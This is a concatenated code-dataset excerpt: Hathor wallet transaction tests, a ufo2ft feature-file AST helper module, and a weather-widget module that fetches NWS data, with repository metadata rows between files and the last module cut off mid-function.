    self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
                     WalletBalance(0, self.initial_balance))

    wallet_address = self.manager.wallet.get_unused_address()

    outputs2 = [
        WalletOutputInfo(address=decode_address(wallet_address), value=500, timelock=None)
    ]

    tx2 = self.manager.wallet.prepare_transaction_compute_inputs(Transaction, outputs2, self.manager.tx_storage)
    tx2.weight = 10
    tx2.parents = self.manager.get_new_tx_parents()
    tx2.timestamp = int(self.clock.seconds())
    tx2.resolve()
    self.manager.propagate_tx(tx2)
    self.run_to_completion()

    outputs3 = [
        WalletOutputInfo(address=decode_address(wallet_address), value=self.blocks_tokens[0], timelock=None)
    ]

    tx3 = self.manager.wallet.prepare_transaction_compute_inputs(Transaction, outputs3, self.manager.tx_storage)
    tx3.weight = 10
    tx3.parents = self.manager.get_new_tx_parents()
    tx3.timestamp = int(self.clock.seconds())
    tx3.resolve()
    self.manager.propagate_tx(tx3)
    self.run_to_completion()

    self.clock.advance(1)
    new_address = self.manager.wallet.get_unused_address_bytes()
    inputs = [WalletInputInfo(tx_id=tx3.hash, index=0, private_key=None)]
    outputs = [WalletOutputInfo(address=new_address, value=self.blocks_tokens[0], timelock=None)]

    tx4 = self.manager.wallet.prepare_transaction_incomplete_inputs(Transaction, inputs, outputs,
                                                                    self.manager.tx_storage)
    tx4.weight = 10
    tx4.parents = [tx3.hash, tx3.parents[0]]
    tx4.timestamp = int(self.clock.seconds())
    tx4.resolve()
    self.manager.propagate_tx(tx4)
    self.run_to_completion()

    # Change of parents only, so it's a twin.
    tx5 = Transaction.create_from_struct(tx4.get_struct())
    tx5.parents = [tx4.parents[1], tx4.parents[0]]
    tx5.weight = 10
    tx5.resolve()

    # Propagate a conflicting twin transaction
    self.manager.propagate_tx(tx5)
    self.run_to_completion()

    meta4 = tx4.get_metadata(force_reload=True)
    self.assertEqual(meta4.twins, [tx5.hash])

    meta5 = tx5.get_metadata(force_reload=True)
    self.assertEqual(meta5.voided_by, {tx5.hash})

    # Balance is the same
    self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
                     WalletBalance(0, self.initial_balance))
def test_tokens_balance(self):
    """Create a custom token, transfer part of it away, and verify the
    token balance drops while the HTR balance is unaffected."""
    # create tokens and check balances

    # initial tokens
    address_b58 = self.manager.wallet.get_unused_address()
    address = decode_address(address_b58)
    tx = create_tokens(self.manager, address_b58)
    token_id = tx.tokens[0]
    amount = tx.outputs[0].value

    # initial token balance
    self.assertEqual(self.manager.wallet.balance[token_id], WalletBalance(0, amount))
    # initial hathor balance
    # we don't consider HTR balance 0 because we transfer genesis tokens to this
    # wallet during token creation
    hathor_balance = self.manager.wallet.balance[settings.HATHOR_TOKEN_UID]

    # transfer token to another wallet and check balance again
    parents = self.manager.get_new_tx_parents()
    _input1 = TxInput(tx.hash, 0, b'')
    script = P2PKH.create_output_script(address)
    # 30 tokens leave this wallet (empty script -> unspendable here)
    token_output1 = TxOutput(30, b'', 0b00000001)
    token_output2 = TxOutput(amount - 30, script, 0b00000001)
    tx2 = Transaction(
        weight=1,
        inputs=[_input1],
        outputs=[token_output1, token_output2],
        parents=parents,
        tokens=[token_id],
        storage=self.manager.tx_storage,
        timestamp=int(self.manager.reactor.seconds())
    )
    data_to_sign = tx2.get_sighash_all()
    public_bytes, signature = self.manager.wallet.get_input_aux_data(
        data_to_sign,
        self.manager.wallet.get_private_key(address_b58)
    )
    tx2.inputs[0].data = P2PKH.create_input_data(public_bytes, signature)
    tx2.resolve()
    tx2.verify()
    self.manager.propagate_tx(tx2)
    self.run_to_completion()

    # verify balance
    self.assertEqual(self.manager.wallet.balance[token_id], WalletBalance(0, amount - 30))
    # hathor balance remains the same
    self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID], hathor_balance)
| 42.199541 | 116 | 0.643405 |
ace75760d01c1f7f49d245df497d9f56dabc2be3 | 61 | py | Python | JDjango/panels/models/__init__.py | JIYANG-PLUS/JDjango | 57cbb13b2b4c07f34d546c0c637c22f60c1e692a | [
"MIT"
] | 3 | 2020-12-28T05:09:02.000Z | 2021-06-23T10:02:03.000Z | JDjango/panels/models/__init__.py | JIYANG-PLUS/JDjango | 57cbb13b2b4c07f34d546c0c637c22f60c1e692a | [
"MIT"
] | null | null | null | JDjango/panels/models/__init__.py | JIYANG-PLUS/JDjango | 57cbb13b2b4c07f34d546c0c637c22f60c1e692a | [
"MIT"
] | null | null | null | from .ShowAllPipsModel import *
from .ShowUrlsModel import *
| 20.333333 | 31 | 0.803279 |
ace7577b73fed90a6c986ea5aa3c01dfbc4449ab | 8,139 | py | Python | Lib/ufo2ft/featureWriters/ast.py | googlefonts/ufo2ft | 0ee84954455cb3f451b32ab8df8509cefe025c72 | [
"MIT"
] | 73 | 2019-04-17T19:28:03.000Z | 2022-03-18T07:45:53.000Z | Lib/ufo2ft/featureWriters/ast.py | jenskutilek/ufo2ft | 3aaf7866f63cc7e9749c9cc84a43cad5c7eb1c0f | [
"MIT"
] | 228 | 2019-05-03T13:05:19.000Z | 2022-03-28T17:58:48.000Z | Lib/ufo2ft/featureWriters/ast.py | jenskutilek/ufo2ft | 3aaf7866f63cc7e9749c9cc84a43cad5c7eb1c0f | [
"MIT"
] | 21 | 2019-05-15T15:13:59.000Z | 2021-09-21T11:32:38.000Z | """Helpers to build or extract data from feaLib AST objects."""
import collections
import functools
import operator
import re
# we re-export here all the feaLib AST classes so they can be used from
# writer modules with a single `from ufo2ft.featureWriters import ast`
import sys
from fontTools import unicodedata
from fontTools.feaLib import ast
# Re-export every feaLib AST class into this module's namespace so writer
# modules can do a single `from ufo2ft.featureWriters import ast`.
self = sys.modules[__name__]
for name in getattr(ast, "__all__", dir(ast)):
    if isinstance(getattr(ast, name), type):
        setattr(self, name, getattr(ast, name))
# Clean up module-level temporaries so they don't leak as public names.
del sys, self, name
def getScriptLanguageSystems(feaFile):
    """Return dictionary keyed by Unicode script code containing lists of
    (OT_SCRIPT_TAG, [OT_LANGUAGE_TAG, ...]) tuples (excluding "DFLT").
    """
    languagesByScript = collections.OrderedDict()
    for ls in [
        st for st in feaFile.statements if isinstance(st, ast.LanguageSystemStatement)
    ]:
        if ls.script == "DFLT":
            continue
        languagesByScript.setdefault(ls.script, []).append(ls.language)

    # Group the OT script tags by their Unicode script code.
    langSysMap = collections.OrderedDict()
    for script, languages in languagesByScript.items():
        sc = unicodedata.ot_tag_to_script(script)
        langSysMap.setdefault(sc, []).append((script, languages))
    return langSysMap
def iterFeatureBlocks(feaFile, tag=None):
    """Yield the feature blocks in `feaFile`; if `tag` is given, only
    blocks whose feature name equals `tag`."""
    for statement in feaFile.statements:
        if isinstance(statement, ast.FeatureBlock):
            if tag is not None and statement.name != tag:
                continue
            yield statement
def findFeatureTags(feaFile):
    """Return the set of feature tags defined in `feaFile`."""
    return {f.name for f in iterFeatureBlocks(feaFile)}
def findCommentPattern(feaFile, pattern):
    """
    Yield a tuple of statements, starting with the parent block, followed by
    nested blocks if present, ending with the comment matching a given pattern.
    There is no parent block if the matched comment is at the root level.
    """
    for statement in feaFile.statements:
        if hasattr(statement, "statements"):
            # Recurse into nested blocks, prefixing each match with its parent.
            for res in findCommentPattern(statement, pattern):
                yield (statement, *res)
        elif isinstance(statement, ast.Comment):
            if re.match(pattern, str(statement)):
                yield (statement,)
def findTable(feaLib, tag):
    """Return the first top-level `table <tag> { ... }` block, or None."""
    for statement in feaLib.statements:
        if isinstance(statement, ast.TableBlock) and statement.name == tag:
            return statement
def iterClassDefinitions(feaFile, featureTag=None):
    """Yield glyph class definitions: top-level ones (when featureTag is
    None), then those nested inside matching feature blocks."""
    if featureTag is None:
        # start from top-level class definitions
        for s in feaFile.statements:
            if isinstance(s, ast.GlyphClassDefinition):
                yield s
    # then iterate over per-feature class definitions
    for fea in iterFeatureBlocks(feaFile, tag=featureTag):
        for s in fea.statements:
            if isinstance(s, ast.GlyphClassDefinition):
                yield s
# OpenType LookupFlag bit values, keyed by their feature-file keyword.
LOOKUP_FLAGS = {
    "RightToLeft": 0x0001,
    "IgnoreBaseGlyphs": 0x0002,
    "IgnoreLigatures": 0x0004,
    "IgnoreMarks": 0x0008,
}
def makeLookupFlag(flags=None, markAttachment=None, markFilteringSet=None):
    """Build an ast.LookupFlagStatement.

    `flags` may be a single flag name, an iterable of names (OR-ed
    together), or None (flag value 0). `markAttachment` and
    `markFilteringSet` must be GlyphClassDefinition objects if given.
    """
    if isinstance(flags, str):
        value = LOOKUP_FLAGS[flags]
    elif flags is not None:
        value = functools.reduce(operator.or_, [LOOKUP_FLAGS[n] for n in flags], 0)
    else:
        value = 0

    if markAttachment is not None:
        assert isinstance(markAttachment, ast.GlyphClassDefinition)
        markAttachment = ast.GlyphClassName(markAttachment)
    if markFilteringSet is not None:
        assert isinstance(markFilteringSet, ast.GlyphClassDefinition)
        markFilteringSet = ast.GlyphClassName(markFilteringSet)

    return ast.LookupFlagStatement(
        value, markAttachment=markAttachment, markFilteringSet=markFilteringSet
    )
def makeGlyphClassDefinitions(groups, feaFile=None, stripPrefix=""):
    """Given a groups dictionary ({str: list[str]}), create feaLib
    GlyphClassDefinition objects for each group.

    Return a dict keyed by the original group name.

    If `stripPrefix` (str) is provided and a group name starts with it,
    the string will be stripped from the beginning of the class name.
    """
    classDefs = {}
    if feaFile is not None:
        # Avoid clashing with class names already defined in the fea file.
        classNames = {cdef.name for cdef in iterClassDefinitions(feaFile)}
    else:
        classNames = set()

    lengthPrefix = len(stripPrefix)
    for groupName, members in sorted(groups.items()):
        originalGroupName = groupName
        if stripPrefix and groupName.startswith(stripPrefix):
            groupName = groupName[lengthPrefix:]
        className = makeFeaClassName(groupName, classNames)
        classNames.add(className)
        classDef = makeGlyphClassDefinition(className, members)
        classDefs[originalGroupName] = classDef
    return classDefs
def makeGlyphClassDefinition(className, members):
    """Return a GlyphClassDefinition named `className` containing `members`."""
    glyphNames = [ast.GlyphName(g) for g in members]
    glyphClass = ast.GlyphClass(glyphNames)
    classDef = ast.GlyphClassDefinition(className, glyphClass)
    return classDef
def makeFeaClassName(name, existingClassNames=None):
    """Make a glyph class name which is legal to use in feature text.

    Ensures the name only includes characters in "A-Za-z0-9._", and
    isn't already defined (appending `_1`, `_2`, ... until unique).
    """
    name = re.sub(r"[^A-Za-z0-9._]", r"", name)
    if existingClassNames is None:
        return name
    i = 1
    origName = name
    while name in existingClassNames:
        name = "%s_%d" % (origName, i)
        i += 1
    return name
def addLookupReferences(
    feature, lookups, script=None, languages=None, exclude_dflt=False
):
    """Add references to named lookups to the feature's statements.

    If `script` (str) and `languages` (sequence of str) are provided,
    only register the lookup for the given script and languages,
    optionally with `exclude_dflt` directive.
    Otherwise add a global reference which will be registered for all
    the scripts and languages in the feature file's `languagesystems`
    statements.
    """
    assert lookups

    if not script:
        for lookup in lookups:
            feature.statements.append(ast.LookupReferenceStatement(lookup))
        return

    feature.statements.append(ast.ScriptStatement(script))
    if exclude_dflt:
        for language in languages or ("dflt",):
            feature.statements.append(
                ast.LanguageStatement(language, include_default=False)
            )
            for lookup in lookups:
                feature.statements.append(ast.LookupReferenceStatement(lookup))
    else:
        feature.statements.append(ast.LanguageStatement("dflt", include_default=True))
        for lookup in lookups:
            feature.statements.append(ast.LookupReferenceStatement(lookup))
        for language in languages or ():
            if language == "dflt":
                continue
            feature.statements.append(
                ast.LanguageStatement(language, include_default=True)
            )
_GDEFGlyphClasses = collections.namedtuple(
"_GDEFGlyphClasses", "base ligature mark component"
)
def getGDEFGlyphClasses(feaLib):
    """Return GDEF GlyphClassDef base/mark/ligature/component glyphs, or
    None if no GDEF table is defined in the feature file.
    """
    for st in feaLib.statements:
        if isinstance(st, ast.TableBlock) and st.name == "GDEF":
            # NOTE: use a distinct loop variable; the original shadowed `st`.
            for inner in st.statements:
                if isinstance(inner, ast.GlyphClassDefStatement):
                    return _GDEFGlyphClasses(
                        frozenset(inner.baseGlyphs.glyphSet())
                        if inner.baseGlyphs is not None
                        else frozenset(),
                        frozenset(inner.ligatureGlyphs.glyphSet())
                        if inner.ligatureGlyphs is not None
                        else frozenset(),
                        frozenset(inner.markGlyphs.glyphSet())
                        if inner.markGlyphs is not None
                        else frozenset(),
                        frozenset(inner.componentGlyphs.glyphSet())
                        if inner.componentGlyphs is not None
                        else frozenset(),
                    )
    return _GDEFGlyphClasses(None, None, None, None)
| 35.233766 | 86 | 0.659909 |
ace758b63e9ce7c31a4106889b2b8c70e29637a4 | 19,973 | py | Python | weather_functions.py | jessehamner/WeatherWidget | 640901ba6edd23e26229eed37b8a227ff80cd0ba | [
"Apache-2.0"
] | 2 | 2020-05-17T17:36:49.000Z | 2020-09-10T18:05:54.000Z | weather_functions.py | jessehamner/WeatherWidget | 640901ba6edd23e26229eed37b8a227ff80cd0ba | [
"Apache-2.0"
] | 16 | 2020-03-23T16:10:26.000Z | 2021-02-21T14:30:15.000Z | weather_functions.py | jessehamner/WeatherWidget | 640901ba6edd23e26229eed37b8a227ff80cd0ba | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Weather functions to be used with the NWS radar and weather information
download script.
Jesse Hamner, 2019-2020
'''
from __future__ import print_function
import os
import re
import datetime
import json
import logging
from time import sleep
from outage import Outage
import requests
import yaml
import pytz
from bs4 import BeautifulSoup
# requests.packages.urllib3.disable_warnings()
def load_settings_and_defaults(settings_dir, settings_file, defaults_file):
    """
    Load in all of the settings, default data, and organize the giant data bag
    into a single dict that can be passed around.

    Returns the combined settings dict, or False on any load failure.
    """
    logging.info('Loading %s from %s', settings_file, settings_dir)
    data = load_yaml(settings_dir, settings_file)
    logging.info('Loading %s from %s', defaults_file, settings_dir)
    defaults = load_yaml(settings_dir, defaults_file)
    if not (data and defaults):
        logging.error('Unable to load settings files. These are required.')
        return False

    data['defaults'] = defaults
    data['today_vars'] = get_today_vars(data['timezone'])
    data['bands'] = data['defaults']['goes_bands']
    data['alert_counties'] = populate_alert_counties(data['counties_for_alerts'],
                                                     data['defaults']['alerts_root'])
    if not data['alert_counties']:
        logging.error('Unable to determine county list. Exiting now.')
        return False
    logging.info('alert counties: %s', str(data['alert_counties']))

    # Substitute the local NWS office abbreviation into the AFD section label.
    data['defaults']['afd_divisions'][4] = re.sub('XXX',
                                                  data['nws_abbr'],
                                                  defaults['afd_divisions'][4])
    logging.info('Defaults and settings loaded.')
    return data
def prettify_timestamp(timestamp):
    """
    Make a more user-readable time stamp for current conditions.

    Input must look like '2020-01-02T03:04:05+00:00'; output is
    '2020-01-02, 03:04:05 UTC'.
    """
    posix_timestamp = datetime.datetime.strptime(timestamp, '%Y-%m-%dT%H:%M:%S+00:00')
    logging.debug('Input timestamp: %s', format(timestamp))
    logging.debug('Posix timestamp: %s', posix_timestamp)
    timetext = datetime.datetime.strftime(posix_timestamp, '%Y-%m-%d, %H:%M:%S UTC')
    logging.debug('Nicely formatted text: %s', timetext)
    return timetext
def sanity_check(value, numtype='float'):
    """
    Check for an actual value in the argument. If it has one, return a
    formatted text string ('{:6.2f}' for floats, '{:.0f}' for ints).

    If it has no value (cannot be coerced to float), return the sentinel
    -9999.9 (a float, NOT a string -- callers must check for it).
    """
    logging.debug('sanity_check() function input value: %s', value)
    if numtype != 'float':
        try:
            return '{0:.0f}'.format(float(value))
        except TypeError:
            return -9999.9
    try:
        return '{0:6.2f}'.format(float(value))
    except TypeError:
        return -9999.9
def quick_doctext(doctext, indicator, value, unit=''):
    """
    Convenience function to standardize the output format of a string:
    appends '\\n<indicator> <value> <unit>' to doctext. Percent units are
    attached without a space ('45%').
    """
    unitspace = ' '
    if unit == '%':
        unitspace = ''
    return str('{0}\n{1} {2}{3}{4}'.format(doctext, indicator, value, unitspace, unit))
def get_metar(base_url, station):
    """
    Hit up https://w1.weather.gov/data/METAR/XXXX.1.txt
    and pull down the latest current conditions METAR data.

    Returns the raw METAR text, or None on a non-200 response.
    """
    # NOTE(review): verify=False disables TLS certificate checking for the
    # whole request -- confirm this is intentional before keeping it.
    metar = requests.get(os.path.join(base_url, station),
                         verify=False, timeout=10)
    if metar.status_code != 200:
        logging.error('Response from server was not OK: %s', metar.status_code)
        return None
    return metar.text
def outage_check(data, filename='outage.txt'):
    """
    Quality assurance check on the weather service :-)

    Writes the outage text to `filename` in the output dir when an outage
    is detected, removes the file otherwise. Returns the parsed outage
    text (or None).
    """
    outage_checker = Outage(data)
    outage_checker.check_outage()
    outage_result = outage_checker.parse_outage()
    outfilepath = os.path.join(data['output_dir'], filename)
    if outage_result is None:
        logging.info('No radar outage(s) detected. Proceeding.')
        try:
            logging.debug('Removing file at %s', outfilepath)
            os.unlink(outfilepath)
        except OSError:
            # Stale file simply wasn't there; nothing to clean up.
            logging.error('File does not exist: %s', outfilepath)
    else:
        # logging.warn is a deprecated alias; use warning().
        logging.warning('There is radar outage text: %s', outage_result)
        try:
            # Use a context manager so the handle is closed even on error.
            with open(outfilepath, 'w') as cur:
                cur.write(outage_result)
        except OSError as exc:
            logging.error('OSError-- %s: %s', outfilepath, exc)
    return outage_result
def write_json(some_dict, outputdir='/tmp', filename='unknown.json'):
    """
    Write an individual dictionary to a JSON output file.

    Returns True on success, False if serialization or writing fails.
    """
    filepath = os.path.join(outputdir, filename)
    with open(filepath, 'w') as out_obj:
        logging.info('writing json to %s', filepath)
        try:
            out_obj.write(json.dumps(some_dict))
            logging.debug('raw dict: %s', some_dict)
            return True
        except (TypeError, ValueError, OSError) as exc:
            # Narrowed from a bare `except Exception` so real bugs surface.
            logging.error('Ugh: %s', exc)
            return False
def write_dict(filepath, some_dict):
    """
    Write out a dict to a text file, one 'key: value' pair per line.

    Always returns True (open() errors propagate to the caller).
    """
    with open(filepath, 'w') as current_alerts:
        # .items() works on both Python 2 and 3; .iteritems() is Py2-only.
        for key, value in some_dict.items():
            logging.debug('Key for this alert entry: %s', key)
            current_alerts.write('{0}: {1}\n'.format(key, value))
    return True
def write_text(filepath, some_text):
    """
    Write a text string out to a file. Returns True.
    """
    with open(filepath, 'w') as text_file:
        logging.debug('writing text to %s', filepath)
        text_file.write(some_text)
        # (removed redundant explicit close(); the `with` block closes it)
    return True
def pull_beaufort_scale():
    """
    Pull in the Beaufort scale information from weather.gov, if needed.

    Returns a list of table rows (each a list of cell strings, with
    'N-M' ranges split into two cells), or None on a bad response.
    """
    b_url = 'https://www.weather.gov/mfl/beaufort'
    pagerequest = requests.get(b_url)
    if pagerequest.status_code != 200:
        logging.error('Response from server was not OK: %s', pagerequest.status_code)
        return None
    # BUG FIX: the original fetched the page a second time here, discarding
    # the response it had just validated. Reuse the checked response.
    beaufort_page = BeautifulSoup(pagerequest.text, 'html')
    btable = beaufort_page.find('table')
    tablerows = btable.find_all('tr')
    dataset = []
    for i in tablerows:
        row = []
        cells = i.find_all('td')
        for j in cells:
            if re.search(r'\d{1,}-\d{1,}', j.text):
                # Split 'low-high' wind-speed ranges into two columns.
                vals = j.text.split('-')
                row.extend(vals)
            else:
                row.append(re.sub(r'\s{2,}', ' ', j.text))
        dataset.append(row)
    return dataset
def conditions_summary(conditions):
    """
    Return a dict of consumer-level observations, say, for display on a
    smart mirror or tablet.

    Missing keys are filled with the string 'none'.
    """
    keys = ['timestamp', 'dewpoint', 'barometricPressure', 'windDirection',
            'windSpeed', 'windGust', 'precipitationLastHour', 'temperature',
            'relativeHumidity', 'heatIndex']
    summary = dict()
    for key in keys:
        try:
            summary[key] = conditions['properties'][key]
        except (KeyError, TypeError) as exc:
            summary[key] = 'none'
            # BUG FIX: original used str.format '{0}' placeholders with
            # logging's lazy %-style args, so the message never interpolated.
            logging.error('Error trying to read summary for key %s: %s', key, exc)
    return summary
def wind_direction(azimuth, data):
    """
    Convert "wind coming from an azimuth" (degrees) to a cardinal-direction
    label using data['defaults']['azdir'] (azimuth -> label mapping).

    Returns None if azimuth is not numeric; returns the string 'None' if
    no sector matches.
    """
    try:
        azimuth = float(azimuth)
    except (TypeError, ValueError) as exc:
        logging.error('Unable to convert azimuth to a numerical value: %s.\nReturning None.', exc)
        return None
    plusminus = data['defaults']['plusminus']  # half-width of a sector: 11.25 degrees
    # .items() works on both Python 2 and 3; .iteritems() is Py2-only.
    for az_deg, val in data['defaults']['azdir'].items():
        az_deg = float(az_deg)
        if (az_deg - plusminus < azimuth) and (az_deg + plusminus >= azimuth):
            return val
    return 'None'
def get_hydrograph(abbr,
                   hydro_url='https://water.weather.gov/resources/hydrographs/',
                   outputdir='/tmp'):
    """
    Retrieve hydrograph image (png) of the current time and specified location

    Can find these abbreviations at
    https://water.weather.gov/ahps2/hydrograph.php

    Raw data output in XML for a location (here, "cart2"):
    https://water.weather.gov/ahps2/hydrograph_to_xml.php?gage=cart2&output=xml

    Returns the requests.Response object; the image is only written to
    disk on a 200 response.
    """
    filename = '{0}_hg.png'.format(abbr.lower())
    retval = requests.get(os.path.join(hydro_url, filename), verify=False)
    logging.debug('retrieving: %s', retval.url)
    logging.debug('return value: %s', retval)
    if retval.status_code == 200:
        # Use a context manager so the handle is closed even on a write error.
        with open(os.path.join(outputdir, 'current_hydrograph.png'), 'wb') as cur1:
            cur1.write(retval.content)
    return retval
def get_today_vars(timezone='America/Chicago'):
    """
    Get various strings from today's date for use in GOES image retrieval.

    Returns a dict with local and UTC day-of-year/year/day/month/hour/minute
    strings plus the local UTC offset in hours (float).
    """
    today = datetime.datetime.now()
    utcnow = datetime.datetime.utcnow()
    local_tz = pytz.timezone(timezone)
    return_dict = dict(doy=datetime.datetime.strftime(today, '%j'),
                       year=datetime.datetime.strftime(today, '%Y'),
                       day=datetime.datetime.strftime(today, '%d'),
                       mon=datetime.datetime.strftime(today, '%b'),
                       hour=datetime.datetime.strftime(today, '%H'),
                       minute=datetime.datetime.strftime(today, '%M'),
                       timezone=timezone,
                       # offset in hours, e.g. -6.0 for CST
                       offset=local_tz.utcoffset(today).total_seconds()/3600,
                       now=today,
                       utcnow=utcnow,
                       utcdoy=datetime.datetime.strftime(utcnow, '%j'),
                       utcyear=datetime.datetime.strftime(utcnow, '%Y')
                       )
    return return_dict
def htable_current_conditions(con_dict,
                              tablefile='current_conditions.html',
                              outputdir='/tmp/'):
    """
    Write out a simple HTML table of the current conditions.

    Each con_dict value is a [value, unit, label] triple; one table row is
    written per entry. Returns True on success, False on a KeyError.
    """
    try:
        with open(os.path.join(outputdir, tablefile), 'w') as htmlout:
            htmlout.write('<table>\n')
            # .items() works on both Python 2 and 3; .iteritems() is Py2-only.
            for key, value in con_dict.items():
                logging.debug('%s: %s', key, value)
                htmlout.write('<tr><td>{0}</td><td>{1} {2}</td></tr>\n'.format(value[2],
                                                                               value[0],
                                                                               value[1])
                              )
            htmlout.write('</table>\n')
            return True
    except KeyError as exc:
        logging.error('Exception: %s', exc)
        return False
def load_yaml(directory, filename):
    """
    Load a YAML file in and return the dictionary that is created.

    Returns None if the file cannot be opened or parsed.
    """
    logging.debug('Entering load_yaml() function.')
    try:
        with open(os.path.join(directory, filename), 'r') as iyaml:
            logging.info('Loading YAML file: %s', os.path.join(directory, filename))
            # SECURITY NOTE: yaml.Loader can construct arbitrary Python
            # objects; only load trusted, local settings files with this.
            # Consider yaml.safe_load for anything user-supplied.
            return yaml.load(iyaml.read(), Loader=yaml.Loader)
    except (OSError, IOError, yaml.YAMLError) as exc:
        print('EXCEPTION -- unable to open yaml settings file: {0}'.format(exc))
        logging.error('Unable to open yaml settings file: %s', exc)
        return None
def convert_units(value, from_unit, to_unit, missing=-9999.9):
    """
    Convert `value` between the unit labels used in settings.yml
    (speeds: m_s-1/kph/km_h-1/mph/kt; pressures: mb/Pa/kPa/inHg;
    temperatures: C/F).

    Returns `missing` for empty/None inputs, the value unchanged for
    percent units, the converted float otherwise, and None if the value
    cannot be coerced or the unit pair is unknown.
    """
    convertme = {'m_s-1':
                 {'kph': lambda x: float(x) * 3.6,
                  'mph': lambda x: float(x) * 2.23694,
                  'kt': lambda x: float(x) * 1.94384
                 },
                 'kph':
                 {'m_s-1': lambda x: float(x) * 0.2778,
                  'mph': lambda x: float(x) * 0.62137,
                  'kt': lambda x: float(x) * 0.54
                 },
                 'km_h-1':
                 {'m_s-1': lambda x: float(x) * 0.2778,
                  'mph': lambda x: float(x) * 0.62137,
                  'kt': lambda x: float(x) * 0.54
                 },
                 'mph':
                 {'m_s-1': lambda x: float(x) * 0.4470389,
                  'kph': lambda x: float(x) * 1.60934,
                  'kt': lambda x: float(x) * 0.869
                 },
                 'kt':
                 {'m_s-1': lambda x: float(x) * 0.514443,
                  'mph': lambda x: float(x) * 1.1508,
                  'kph': lambda x: float(x) * 1.852
                 },
                 'mb':
                 {'Pa': lambda x: float(x) * 100.0,
                  'kPa': lambda x: float(x) * 0.10,
                  'bar': lambda x: float(x) * 1000.0,
                  'inHg': lambda x: float(x) * 0.02953
                 },
                 'Pa':
                 {'mb': lambda x: float(x) * 1E-2,
                  'kPa': lambda x: float(x) * 1E-3,
                  'bar': lambda x: float(x) * 1E-5,
                  'inHg': lambda x: float(x) * 0.0002953
                 },
                 'kPa':
                 {'mb': lambda x: float(x) * 1E5,
                  'Pa': lambda x: float(x) * 1E3,
                  'bar': lambda x: float(x) * 0.01,
                  'inHg': lambda x: float(x) * 0.2953
                 },
                 'inHg':
                 {'mb': lambda x: float(x) * 33.86390607,
                  'Pa': lambda x: float(x) * 3386.390607,
                  'bar': lambda x: float(x) * 0.03386390607,
                  'kPa': lambda x: float(x) * 3.386390607
                 },
                 'C':
                 {'F': lambda x: (float(x) * 9.0/5.0) + 32.0,
                  'R': lambda x: (float(x) * 9.0/5.0) + 491.67,
                  'K': lambda x: float(x) + 273.15
                 },
                 'F':
                 {'C': lambda x: (float(x) - 32.0) * 5.0 / 9.0,
                  'R': lambda x: float(x) + 491.67,
                  'K': lambda x: ((float(x) - 32.0) * 5.0 / 9.0) + 273.15
                 },
                 'percent':
                 {'percent': lambda x: x
                 }
                }
    percents = ['percent', 'pct', '%', 'Percent']
    if value == '' or value == 'None' or value is None:
        return missing
    if from_unit in percents or to_unit in percents:
        # Percentages pass through unchanged.
        return value
    if value == missing:
        return missing
    try:
        return convertme[from_unit][to_unit](value)
    except (ValueError, KeyError):
        # Non-numeric value or unknown unit pair.
        return None
def beaufort_scale(data, speed, units='mph'):
    """
    Determine the Beaufort scale ranking of a given wind speed.
    Gusts are NOT used to determine scale rank.

    data['defaults']['beaufort_scale'] maps rank -> [min_mph, max_mph].
    Returns the rank as an int, or None for unusable / out-of-range speeds.
    """
    blist = data['defaults']['beaufort_scale']
    if speed is None or speed == 'None':
        logging.error('Input speed %s cannot be converted to Beaufort. Returning None.', speed)
        return None
    logging.debug('input speed value: %s %s', speed, units)
    if units != 'mph':
        speed = convert_units(speed, from_unit=units, to_unit='mph')
        logging.debug('output speed value: %s mph', speed)
    speed = int(speed)
    logging.debug('integer speed value: %s mph', speed)
    # .items() avoids Py2-only .keys() indexing; chained comparison is clearer.
    for rank, (low, high) in blist.items():
        logging.debug('Key: %s\tmin speed: %s\tmax speed: %s', rank, low, high)
        if int(low) <= speed <= int(high):
            logging.debug('Speed (%s mph) between %s & %s. Returning %s',
                          speed, low, high, rank)
            return int(rank)
    return None
def make_request(url, retries=1, payload=False, use_json=True):
    """
    Uniform function for requests.get() with retry-on-timeout.

    Returns the decoded payload (json dict or text) or None after
    `retries` failed attempts.
    """
    response = None  # guard: all attempts may time out before assignment
    while retries:
        try:
            if payload:
                response = requests.get(url, params=payload, verify=False, timeout=10)
            else:
                response = requests.get(url, verify=False, timeout=10)
        except requests.exceptions.ReadTimeout as exc:
            logging.warning('Request timed out: %s', exc)
            sleep(2)
            # BUG FIX: the original payload branch `continue`d without
            # decrementing `retries`, looping forever on repeated timeouts.
            retries = retries - 1
            continue
        if response:
            resp = judge_payload(response, use_json)
            if resp:
                return resp
        retries = retries - 1
    logging.error('Unsuccessful response (%s). Returning -None-',
                  getattr(response, 'status_code', None))
    return None
def judge_payload(response, use_json):
    """
    Pull out the request payload, provided it's either text or json.

    Returns the decoded json (use_json=True) or .text, or None on a
    missing/undecodable/non-200 response.
    """
    try:
        if response.status_code:
            pass
    except AttributeError:
        # response is None or not a Response-like object.
        logging.error('No response to HTTP query. Returning -None-.')
        return None
    if response.status_code == 200:
        if use_json is True:
            try:
                return response.json()
            except Exception as exc:
                # logging.warn is a deprecated alias; use warning().
                logging.warning('Unable to decode JSON: %s', exc)
        else:
            try:
                return response.text
            except Exception as exc:
                logging.error('Unable to decode response text: %s', exc)
                return None
    logging.error('Response from server was not OK: %s', response.status_code)
    return None
def populate_alert_counties(somedict, alerts_url):
    """
    Takes in a dict, formatted with state name(s) as the key, with a list
    of county names as the value.

    Returns a populated dictionary with records in the format:

    'countyname': [1, 'CountyAbbr', 'ZoneAbbr', 'StateAbbr']

    Returns None if either zone table cannot be retrieved.
    """
    returndict = {}
    # .items() works on both Python 2 and 3; .iteritems() is Py2-only.
    for key, values in somedict.items():
        statezonelist = get_zonelist(key, 'zone', alerts_url)
        if not statezonelist:
            return None
        statecountylist = get_zonelist(key, 'county', alerts_url)
        if not statecountylist:
            return None
        for county in values:
            logging.info('Opening zone and county tables for county: %s', county)
            cabbr = parse_zone_table(county, statecountylist)
            zabbr = parse_zone_table(county, statezonelist)
            returndict[county] = [1, cabbr, zabbr, key]
    return returndict
def get_zonelist(stateabbr, zoneorcounty, alerts_url):
    """
    go to alerts.weather.gov/cap/ and retrieve the forecast zone / county for
    the given name of the county. There are other zone names than only county
    names, like "Central Brewster County", "Chisos Basin", "Coastal Galveston",
    or even "Guadalupe Mountains Above 7000 Feet", so the user can also list
    these as "counties".

    Returns the parsed table rows, or None on failure.
    """
    # Only 'zone' and 'county' are valid table types.
    if zoneorcounty not in ('zone', 'county'):
